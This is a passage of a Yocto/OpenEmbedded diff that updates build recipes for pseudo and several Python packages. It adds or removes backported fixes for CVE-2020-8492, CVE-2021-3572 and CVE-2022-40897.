- 			     FD_ISSET(clients[0].fd, &reads))) {
-@@ -903,6 +910,9 @@ pseudo_server_loop(void) {
- 					 */
- 					pseudo_server_timeout = DEFAULT_PSEUDO_SERVER_TIMEOUT;
- 					die_peacefully = 0;
-+				} else if (errno == EMFILE) {
-+					hitmaxfiles = 1;
-+					pseudo_debug(PDBGF_SERVER, "Hit max open files, dropping a client.\n");
- 				}
- 			}
- 			pseudo_debug(PDBGF_SERVER, "server loop complete [%d clients left]\n", active_clients);
--- 
-2.15.1
-
diff --git a/meta/recipes-devtools/pseudo/files/xattr_version.patch b/meta/recipes-devtools/pseudo/files/xattr_version.patch
deleted file mode 100644
index a8b14bdd69..0000000000
--- a/meta/recipes-devtools/pseudo/files/xattr_version.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-On a tumbleweed system, "install X Y" was showing the error:
-
-pseudo: ENOSYS for 'fsetxattr'.
-
-which was being caused by dlsym() for that function returning NULL. This
-appears to be due to it finding an unresolved symbol in libacl for this 
-symbol in libattr. It hasn't been resolved so its NULL. dlerror() returns
-nothing since this is a valid symbol entry, its just not the one we want.
-
-We can add the glibc version string for the symbol we actually want so we get
-that version rather than the libattr/libacl one.
-
-To quote libattr:
-"""
- These dumb wrappers are for backwards compatibility only.
- Actual syscall wrappers are long gone to libc.
-"""
-and they are simply wrappers around the libc version so our attaching
-to the libc versions should intercept any accesses via these too.
-
-RP 2020/06/22
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org
-Upstream-Status: Pending [discussed with seebs on irc and appears the correct fix]
-
-
-Index: git/ports/linux/xattr/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/xattr/wrapfuncs.in
-+++ git/ports/linux/xattr/wrapfuncs.in
-@@ -1,12 +1,12 @@
--ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0 */
--ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size);
--int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0 */
--int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW */
--int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags);
--ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0 */
--ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t flistxattr(int filedes, char *list, size_t size);
--int removexattr(const char *path, const char *name); /* flags=0 */
--int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW */
--int fremovexattr(int filedes, const char *name);
-+ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0, version="GLIBC_2.3" */ 
-+ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size); /* version="GLIBC_2.3" */
-+int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0, version="GLIBC_2.3" */
-+int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags); /* version="GLIBC_2.3" */
-+ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t flistxattr(int filedes, char *list, size_t size); /* version="GLIBC_2.3" */
-+int removexattr(const char *path, const char *name); /* flags=0, version="GLIBC_2.3" */
-+int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fremovexattr(int filedes, const char *name); /* version="GLIBC_2.3" */
diff --git a/meta/recipes-devtools/pseudo/pseudo.inc b/meta/recipes-devtools/pseudo/pseudo.inc
index 50e30064bd..e6512bc6e6 100644
--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -4,6 +4,7 @@
 
 SUMMARY = "Pseudo gives fake root capabilities to a normal user"
 HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo"
+DESCRIPTION = "The pseudo utility offers a way to run commands in a virtualized root environment."
 LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574"
 SECTION = "base"
 LICENSE = "LGPL2.1"
@@ -111,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
 	fi
 }
 
+do_compile_append_class-native () {
+	if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
+		for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
+			grep $i.1 ${S}/pseudo_ports.h
+			if [ $? != 0 ]; then
+				echo "$i not enabled in pseudo which is incompatible with uninative"
+				exit 1
+			fi
+		done
+	fi
+}
+
+
 do_install () {
 	oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
 }
diff --git a/meta/recipes-devtools/pseudo/pseudo_git.bb b/meta/recipes-devtools/pseudo/pseudo_git.bb
index 419bac19fe..b5da3f0e29 100644
--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -1,22 +1,19 @@
 require pseudo.inc
 
-SRC_URI = "git://git.yoctoproject.org/pseudo \
+SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
            file://0001-configure-Prune-PIE-flags.patch \
            file://fallback-passwd \
            file://fallback-group \
-           file://moreretries.patch \
-           file://toomanyfiles.patch \
-           file://0001-maketables-wrappers-use-Python-3.patch \
-           file://0001-Add-statx.patch \
-           file://0001-realpath.c-Remove-trailing-slashes.patch \
-           file://0006-xattr-adjust-for-attr-2.4.48-release.patch \
-           file://seccomp.patch \
-           file://0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch \
-           file://0001-pseudo_ipc.h-Fix-enum-typedef.patch \
-           file://xattr_version.patch \
            "
+SRC_URI:append:class-native = " \
+    http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+    file://older-glibc-symbols.patch"
+SRC_URI:append:class-nativesdk = " \
+    http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+    file://older-glibc-symbols.patch"
+SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
 
-SRCREV = "060058bb29f70b244e685b3c704eb0641b736f73"
+SRCREV = "2b4b88eb513335b0ece55fe51854693d9b20de35"
 S = "${WORKDIR}/git"
 PV = "1.9.0+git${SRCPV}"
 
diff --git a/meta/recipes-devtools/python-numpy/python-numpy.inc b/meta/recipes-devtools/python-numpy/python-numpy.inc
index 42032a04a8..4cc506474b 100644
--- a/meta/recipes-devtools/python-numpy/python-numpy.inc
+++ b/meta/recipes-devtools/python-numpy/python-numpy.inc
@@ -1,4 +1,6 @@
 SUMMARY = "A sophisticated Numeric Processing Package for Python"
+HOMEPAGE = "https://numpy.org/"
+DESCRIPTION = "NumPy is the fundamental package needed for scientific computing with Python."
 SECTION = "devel/python"
 LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1"
diff --git a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch b/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
deleted file mode 100644
index e16b99bcb9..0000000000
--- a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
+++ /dev/null
@@ -1,248 +0,0 @@
-From 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4 Mon Sep 17 00:00:00 2001
-From: Victor Stinner <vstinner@python.org>
-Date: Thu, 2 Apr 2020 02:52:20 +0200
-Subject: [PATCH] bpo-39503: CVE-2020-8492: Fix AbstractBasicAuthHandler
- (GH-18284)
-
-Upstream-Status: Backport
-(https://github.com/python/cpython/commit/0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
-
-CVE: CVE-2020-8492
-
-The AbstractBasicAuthHandler class of the urllib.request module uses
-an inefficient regular expression which can be exploited by an
-attacker to cause a denial of service. Fix the regex to prevent the
-catastrophic backtracking. Vulnerability reported by Ben Caller
-and Matt Schwager.
-
-AbstractBasicAuthHandler of urllib.request now parses all
-WWW-Authenticate HTTP headers and accepts multiple challenges per
-header: use the realm of the first Basic challenge.
-
-Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
-Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
----
- Lib/test/test_urllib2.py                      | 90 ++++++++++++-------
- Lib/urllib/request.py                         | 69 ++++++++++----
- .../2020-03-25-16-02-16.bpo-39503.YmMbYn.rst  |  3 +
- .../2020-01-30-16-15-29.bpo-39503.B299Yq.rst  |  5 ++
- 4 files changed, 115 insertions(+), 52 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
- create mode 100644 Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-
-diff --git a/Lib/test/test_urllib2.py b/Lib/test/test_urllib2.py
-index 8abedaac98..e69ac3e213 100644
---- a/Lib/test/test_urllib2.py
-+++ b/Lib/test/test_urllib2.py
-@@ -1446,40 +1446,64 @@ class HandlerTests(unittest.TestCase):
-         bypass = {'exclude_simple': True, 'exceptions': []}
-         self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
- 
--    def test_basic_auth(self, quote_char='"'):
--        opener = OpenerDirector()
--        password_manager = MockPasswordManager()
--        auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
--        realm = "ACME Widget Store"
--        http_handler = MockHTTPHandler(
--            401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
--            (quote_char, realm, quote_char))
--        opener.add_handler(auth_handler)
--        opener.add_handler(http_handler)
--        self._test_basic_auth(opener, auth_handler, "Authorization",
--                              realm, http_handler, password_manager,
--                              "http://acme.example.com/protected",
--                              "http://acme.example.com/protected",
--                              )
--
--    def test_basic_auth_with_single_quoted_realm(self):
--        self.test_basic_auth(quote_char="'")
--
--    def test_basic_auth_with_unquoted_realm(self):
--        opener = OpenerDirector()
--        password_manager = MockPasswordManager()
--        auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
--        realm = "ACME Widget Store"
--        http_handler = MockHTTPHandler(
--            401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
--        opener.add_handler(auth_handler)
--        opener.add_handler(http_handler)
--        with self.assertWarns(UserWarning):
-+    def check_basic_auth(self, headers, realm):
-+        with self.subTest(realm=realm, headers=headers):
-+            opener = OpenerDirector()
-+            password_manager = MockPasswordManager()
-+            auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-+            body = '\r\n'.join(headers) + '\r\n\r\n'
-+            http_handler = MockHTTPHandler(401, body)
-+            opener.add_handler(auth_handler)
-+            opener.add_handler(http_handler)
-             self._test_basic_auth(opener, auth_handler, "Authorization",
--                                realm, http_handler, password_manager,
--                                "http://acme.example.com/protected",
--                                "http://acme.example.com/protected",
--                                )
-+                                  realm, http_handler, password_manager,
-+                                  "http://acme.example.com/protected",
-+                                  "http://acme.example.com/protected")
-+
-+    def test_basic_auth(self):
-+        realm = "realm2@example.com"
-+        realm2 = "realm2@example.com"
-+        basic = f'Basic realm="{realm}"'
-+        basic2 = f'Basic realm="{realm2}"'
-+        other_no_realm = 'Otherscheme xxx'
-+        digest = (f'Digest realm="{realm2}", '
-+                  f'qop="auth, auth-int", '
-+                  f'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
-+                  f'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
-+        for realm_str in (
-+            # test "quote" and 'quote'
-+            f'Basic realm="{realm}"',
-+            f"Basic realm='{realm}'",
-+
-+            # charset is ignored
-+            f'Basic realm="{realm}", charset="UTF-8"',
-+
-+            # Multiple challenges per header
-+            f'{basic}, {basic2}',
-+            f'{basic}, {other_no_realm}',
-+            f'{other_no_realm}, {basic}',
-+            f'{basic}, {digest}',
-+            f'{digest}, {basic}',
-+        ):
-+            headers = [f'WWW-Authenticate: {realm_str}']
-+            self.check_basic_auth(headers, realm)
-+
-+        # no quote: expect a warning
-+        with support.check_warnings(("Basic Auth Realm was unquoted",
-+                                     UserWarning)):
-+            headers = [f'WWW-Authenticate: Basic realm={realm}']
-+            self.check_basic_auth(headers, realm)
-+
-+        # Multiple headers: one challenge per header.
-+        # Use the first Basic realm.
-+        for challenges in (
-+            [basic,  basic2],
-+            [basic,  digest],
-+            [digest, basic],
-+        ):
-+            headers = [f'WWW-Authenticate: {challenge}'
-+                       for challenge in challenges]
-+            self.check_basic_auth(headers, realm)
- 
-     def test_proxy_basic_auth(self):
-         opener = OpenerDirector()
-diff --git a/Lib/urllib/request.py b/Lib/urllib/request.py
-index 7fe50535da..2a3d71554f 100644
---- a/Lib/urllib/request.py
-+++ b/Lib/urllib/request.py
-@@ -937,8 +937,15 @@ class AbstractBasicAuthHandler:
- 
-     # allow for double- and single-quoted realm values
-     # (single quotes are a violation of the RFC, but appear in the wild)
--    rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
--                    'realm=(["\']?)([^"\']*)\\2', re.I)
-+    rx = re.compile('(?:^|,)'   # start of the string or ','
-+                    '[ \t]*'    # optional whitespaces
-+                    '([^ \t]+)' # scheme like "Basic"
-+                    '[ \t]+'    # mandatory whitespaces
-+                    # realm=xxx
-+                    # realm='xxx'
-+                    # realm="xxx"
-+                    'realm=(["\']?)([^"\']*)\\2',
-+                    re.I)
- 
-     # XXX could pre-emptively send auth info already accepted (RFC 2617,
-     # end of section 2, and section 1.2 immediately after "credentials"
-@@ -950,27 +957,51 @@ class AbstractBasicAuthHandler:
-         self.passwd = password_mgr
-         self.add_password = self.passwd.add_password
- 
-+    def _parse_realm(self, header):
-+        # parse WWW-Authenticate header: accept multiple challenges per header
-+        found_challenge = False
-+        for mo in AbstractBasicAuthHandler.rx.finditer(header):
-+            scheme, quote, realm = mo.groups()
-+            if quote not in ['"', "'"]:
-+                warnings.warn("Basic Auth Realm was unquoted",
-+                              UserWarning, 3)
-+
-+            yield (scheme, realm)
-+
-+            found_challenge = True
-+
-+        if not found_challenge:
-+            if header:
-+                scheme = header.split()[0]
-+            else:
-+                scheme = ''
-+            yield (scheme, None)
-+
-     def http_error_auth_reqed(self, authreq, host, req, headers):
-         # host may be an authority (without userinfo) or a URL with an
-         # authority
--        # XXX could be multiple headers
--        authreq = headers.get(authreq, None)
-+        headers = headers.get_all(authreq)
-+        if not headers:
-+            # no header found
-+            return
- 
--        if authreq:
--            scheme = authreq.split()[0]
--            if scheme.lower() != 'basic':
--                raise ValueError("AbstractBasicAuthHandler does not"
--                                 " support the following scheme: '%s'" %
--                                 scheme)
--            else:
--                mo = AbstractBasicAuthHandler.rx.search(authreq)
--                if mo:
--                    scheme, quote, realm = mo.groups()
--                    if quote not in ['"',"'"]:
--                        warnings.warn("Basic Auth Realm was unquoted",
--                                      UserWarning, 2)
--                    if scheme.lower() == 'basic':
--                        return self.retry_http_basic_auth(host, req, realm)
-+        unsupported = None
-+        for header in headers:
-+            for scheme, realm in self._parse_realm(header):
-+                if scheme.lower() != 'basic':
-+                    unsupported = scheme
-+                    continue
-+
-+                if realm is not None:
-+                    # Use the first matching Basic challenge.
-+                    # Ignore following challenges even if they use the Basic
-+                    # scheme.
-+                    return self.retry_http_basic_auth(host, req, realm)
-+
-+        if unsupported is not None:
-+            raise ValueError("AbstractBasicAuthHandler does not "
-+                             "support the following scheme: %r"
-+                             % (scheme,))
- 
-     def retry_http_basic_auth(self, host, req, realm):
-         user, pw = self.passwd.find_user_password(realm, host)
-diff --git a/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-new file mode 100644
-index 0000000000..be80ce79d9
---- /dev/null
-+++ b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
-@@ -0,0 +1,3 @@
-+:class:`~urllib.request.AbstractBasicAuthHandler` of :mod:`urllib.request`
-+now parses all WWW-Authenticate HTTP headers and accepts multiple challenges
-+per header: use the realm of the first Basic challenge.
-diff --git a/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-new file mode 100644
-index 0000000000..9f2800581c
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-@@ -0,0 +1,5 @@
-+CVE-2020-8492: The :class:`~urllib.request.AbstractBasicAuthHandler` class of the
-+:mod:`urllib.request` module uses an inefficient regular expression which can
-+be exploited by an attacker to cause a denial of service. Fix the regex to
-+prevent the catastrophic backtracking. Vulnerability reported by Ben Caller
-+and Matt Schwager.
--- 
-2.24.1
-
diff --git a/meta/recipes-devtools/python/python-setuptools.inc b/meta/recipes-devtools/python/python-setuptools.inc
index 29be852f66..5faf62bc3a 100644
--- a/meta/recipes-devtools/python/python-setuptools.inc
+++ b/meta/recipes-devtools/python/python-setuptools.inc
@@ -8,6 +8,8 @@ PYPI_PACKAGE_EXT = "zip"
 
 inherit pypi
 
+SRC_URI += " file://CVE-2022-40897.patch "
+
 SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch"
 
 SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30"
diff --git a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
index 89538d2f27..9f054c6024 100644
--- a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb
+++ b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
@@ -1,12 +1,15 @@
 DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python."
+HOMEPAGE = "https://pypi.org/project/Jinja2/"
 
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462"
 
-SRC_URI[sha256sum] = "89aab215427ef59c34ad58735269eb58b1a5808103067f7bb9d5836c651b3bb0"
+SRC_URI[sha256sum] = "a6d58433de0ae800347cab1fa3043cebbabe8baa9d29e668f1c768cb87a333c6"
 
 PYPI_PACKAGE = "Jinja2"
 
+CVE_PRODUCT = "jinja2 jinja"
+
 CLEANBROKEN = "1"
 
 inherit pypi setuptools3
diff --git a/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
index 698016ba4c..b73310c808 100644
--- a/meta/recipes-devtools/python/python3-magic_0.4.15.bb
+++ b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
@@ -14,6 +14,11 @@ inherit pypi setuptools3
 SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59"
 SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5"
 
-RDEPENDS_${PN} += "file"
+DEPENDS_append_class-native = " file-replacement-native"
+
+RDEPENDS_${PN} += "file \
+                   ${PYTHON_PN}-ctypes \
+                   ${PYTHON_PN}-io \
+                   ${PYTHON_PN}-shell"
 
 BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
new file mode 100644
index 0000000000..a38ab57bc6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
@@ -0,0 +1,48 @@
+From c4fd13410b9a219f77fc30775d4a0ac9f69725bd Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 09:52:43 +0530
+Subject: [PATCH] CVE-2021-3572
+
+Upstream-Status: Backport [https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b]
+CVE: CVE-2021-3572
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ news/9827.bugfix.rst         |  3 +++
+ src/pip/_internal/vcs/git.py | 10 ++++++++--
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+ create mode 100644 news/9827.bugfix.rst
+
+diff --git a/news/9827.bugfix.rst b/news/9827.bugfix.rst
+new file mode 100644
+index 0000000..e0d27c3
+--- /dev/null
++++ b/news/9827.bugfix.rst
+@@ -0,0 +1,3 @@
++**SECURITY**: Stop splitting on unicode separators in git references,
++which could be maliciously used to install a different revision on the
++repository.
+diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
+index 7483303..1b895f6 100644
+--- a/src/pip/_internal/vcs/git.py
++++ b/src/pip/_internal/vcs/git.py
+@@ -137,9 +137,15 @@ class Git(VersionControl):
+         output = cls.run_command(['show-ref', rev], cwd=dest,
+                                  show_stdout=False, on_returncode='ignore')
+         refs = {}
+-        for line in output.strip().splitlines():
++        # NOTE: We do not use splitlines here since that would split on other
++        #       unicode separators, which can be maliciously used to install a
++        #       different revision.
++        for line in output.strip().split("\n"):
++            line = line.rstrip("\r")
++            if not line:
++                continue
+             try:
+-                sha, ref = line.split()
++                ref_sha, ref_name = line.split(" ", maxsplit=2)
+             except ValueError:
+                 # Include the offending line to simplify troubleshooting if
+                 # this error ever occurs.
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/python/python3-pip_20.0.2.bb b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
index 08738fb2f9..e24c6f4477 100644
--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
 
 DEPENDS += "python3 python3-setuptools-native"
 
+SRC_URI = "file://CVE-2021-3572.patch "
 SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
 SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
 
diff --git a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
index 8f60834c17..8452d7fa9f 100644
--- a/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
+++ b/meta/recipes-devtools/python/python3-pycairo_1.19.0.bb
@@ -18,7 +18,7 @@ SRC_URI[sha256sum] = "4f5ba9374a46c98729dd3727d993f5e17ed0286fd6738ed464fe4efa06
 
 S = "${WORKDIR}/pycairo-${PV}"
 
-inherit meson pkgconfig
+inherit meson pkgconfig python3targetconfig
 
 CFLAGS += "-fPIC"
 
diff --git a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
index 6babf0cae8..29825492b9 100644
--- a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
+++ b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Python GObject bindings"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/pygobject"
+DESCRIPTION = "PyGObject is a Python package which provides bindings for GObject based libraries such as GTK, GStreamer, WebKitGTK, GLib, GIO and many more."
 SECTION = "devel/python"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
diff --git a/meta/recipes-devtools/python/python3-scons_3.1.2.bb b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
index ce117a92d4..12122131a5 100644
--- a/meta/recipes-devtools/python/python3-scons_3.1.2.bb
+++ b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Software Construction tool (make/autotools replacement)"
+HOMEPAGE = "https://github.com/SCons/scons"
 SECTION = "devel/python"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0"
diff --git a/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
new file mode 100644
index 0000000000..9150cea07e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
@@ -0,0 +1,29 @@
+From 43a9c9bfa6aa626ec2a22540bea28d2ca77964be Mon Sep 17 00:00:00 2001
+From: "Jason R. Coombs" <jaraco@jaraco.com>
+Date: Fri, 4 Nov 2022 13:47:53 -0400
+Subject: [PATCH] Limit the amount of whitespace to search/backtrack. Fixes
+ #3659.
+
+CVE: CVE-2022-40897
+Upstream-Status: Backport [
+Upstream :  https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be
+Import from Ubuntu: http://archive.ubuntu.com/ubuntu/pool/main/s/setuptools/setuptools_45.2.0-1ubuntu0.1.debian.tar.xz
+]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ setuptools/package_index.py           | 2 +-
+ setuptools/tests/test_packageindex.py | 1 -
+ 2 files changed, 1 insertion(+), 2 deletions(-)
+
+--- setuptools-45.2.0.orig/setuptools/package_index.py
++++ setuptools-45.2.0/setuptools/package_index.py
+@@ -215,7 +215,7 @@ def unique_values(func):
+     return wrapper
+ 
+ 
+-REL = re.compile(r"""<([^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*)>""", re.I)
++REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)
+ # this line is here to fix emacs' cruddy broken syntax highlighting
+ 
+ 
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
index c4fae09a5b..4ac0e140cc 100644
--- a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+++ b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
@@ -14,17 +14,21 @@ Upstream-Status: Submitted [https://github.com/python/cpython/pull/13196]
 Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io>
 
 %% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+
+Updated to apply after dea270a2a80214de22afadaaca2043d0d782eb7d
+
+Signed-off-by: Tim Orling <tim.orling@konsulko.com>
 ---
  configure.ac | 175 +++++++--------------------------------------------
  1 file changed, 21 insertions(+), 154 deletions(-)
 
 diff --git a/configure.ac b/configure.ac
-index ede710e..bc81b0b 100644
+index de83332dd3..16b02d0798 100644
 --- a/configure.ac
 +++ b/configure.ac
-@@ -710,160 +710,27 @@ fi
- MULTIARCH=$($CC --print-multiarch 2>/dev/null)
- AC_SUBST(MULTIARCH)
+@@ -719,160 +719,27 @@ then
+ fi
+ 
  
 -AC_MSG_CHECKING([for the platform triplet based on compiler characteristics])
 -cat >> conftest.c <<EOF
@@ -185,25 +189,25 @@ index ede710e..bc81b0b 100644
 +## Need to handle macos, vxworks and hurd special (?) :-/
 +case ${target_os} in
 +     darwin*)
-+     	PLATFORM_TRIPLET=darwin
-+	;;
++       PLATFORM_TRIPLET=darwin
++       ;;
 +     hurd*)
-+     	PLATFORM_TRIPLET=i386-gnu
-+	;;
++       PLATFORM_TRIPLET=i386-gnu
++       ;;
 +     vxworks*)
-+     	PLATFORM_TRIPLET=vxworks
-+	;;
++       PLATFORM_TRIPLET=vxworks
++       ;;
 +     *)
 +        if test "${target_cpu}" != "i686"; then
-+		PLATFORM_TRIPLET=${target_cpu}-${target_os}
-+	else
-+		PLATFORM_TRIPLET=i386-${target_os}
-+	fi
-+	;;
-+esac	
++               PLATFORM_TRIPLET=${target_cpu}-${target_os}
++       else
++               PLATFORM_TRIPLET=i386-${target_os}
++       fi
++       ;;
++esac
  
- if test x$PLATFORM_TRIPLET != x && test x$MULTIARCH != x; then
-   if test x$PLATFORM_TRIPLET != x$MULTIARCH; then
+ if test x$PLATFORM_TRIPLET != xdarwin; then
+   MULTIARCH=$($CC --print-multiarch 2>/dev/null)
 -- 
-2.24.1
+2.32.0
 
diff --git a/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
new file mode 100644
index 0000000000..a44d3396a6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
@@ -0,0 +1,33 @@
+From 7a2bddfa437be633bb6945d0e6b7d6f27da870ad Mon Sep 17 00:00:00 2001
